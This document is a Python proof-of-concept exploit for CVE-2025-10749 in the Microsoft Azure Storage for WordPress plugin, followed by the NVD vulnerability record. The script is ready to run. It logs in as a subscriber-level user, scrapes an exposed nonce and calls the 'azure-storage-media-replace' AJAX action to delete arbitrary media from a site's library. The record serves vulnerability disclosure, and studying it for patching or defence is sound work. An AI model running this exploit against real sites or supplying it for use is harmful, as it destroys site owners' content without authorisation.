CVE-2025-10749

import requests import re # CVE-2025-10749 PoC - Unauthorized Media Deletion # Target: Microsoft Azure Storage for WordPress plugin <= 4.5.1 target_url = "http://target-wordpress-site.com" username = "attacker" password = "password" # Step 1: Authenticate and get nonce session = requests.Session() login_url = f"{target_url}/wp-login.php" login_data = { "log": username, "pwd": password, "wp-submit": "Log In" } session.post(login_url, data=login_data) # Step 2: Get exposed nonce from admin-ajax.php ajax_url = f"{target_url}/wp-admin/admin-ajax.php" response = session.get(ajax_url) # Extract nonce from response (it may be exposed in various AJAX hooks) nonce_match = re.search(r'nonce["\']?\s*:\s*["\']([a-zA-Z0-9]+)["\']', response.text) if nonce_match: nonce = nonce_match.group(1) else: # Alternative: Get nonce from page source admin_url = f"{target_url}/wp-admin/admin.php?page=azure-storage" admin_page = session.get(admin_url) nonce_match = re.search(r'nonce["\']?\s*:\s*["\']([a-zA-Z0-9]+)["\']', admin_page.text) nonce = nonce_match.group(1) if nonce_match else "" # Step 3: Delete arbitrary media (modify attachment_id to target file) media_id_to_delete = 123 # Target media ID exploit_data = { "action": "azure-storage-media-replace", "nonce": nonce, "replace_attachment": media_id_to_delete, "delete_old": "1" } response = session.post(ajax_url, data=exploit_data) print(f"Exploit sent. Response: {response.text}") if "success" in response.text.lower() or response.status_code == 200: print("Media deletion successful - vulnerability confirmed")

{"cve": {"id": "CVE-2025-10749", "sourceIdentifier": "[email protected]", "published": "2025-10-24T09:15:41.670", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Microsoft Azure Storage for WordPress plugin for WordPress is vulnerable to Unauthorized Arbitrary Media Deletion in all versions up to, and including, 4.5.1. This is due to missing capability checks on the 'azure-storage-media-replace' AJAX action. This makes it possible for authenticated attackers with subscriber-level access and above to delete arbitrary media files from the WordPress Media Library via the replace_attachment parameter granted they can access the nonce which is exposed to all authenticated users."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/windows-azure-storage/tags/4.5.1/includes/class-windows-azure-replace-media.php#L152", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/windows-azure-storage/tags/4.5.1/includes/class-windows-azure-replace-media.php#L346", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3386127%40windows-azure-storage&new=3386127%40windows-azure-storage&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e1b80852-a221-4c2c-b76d-8bdcd1e0f1ad?source=cve", "source": "[email protected]"}]}}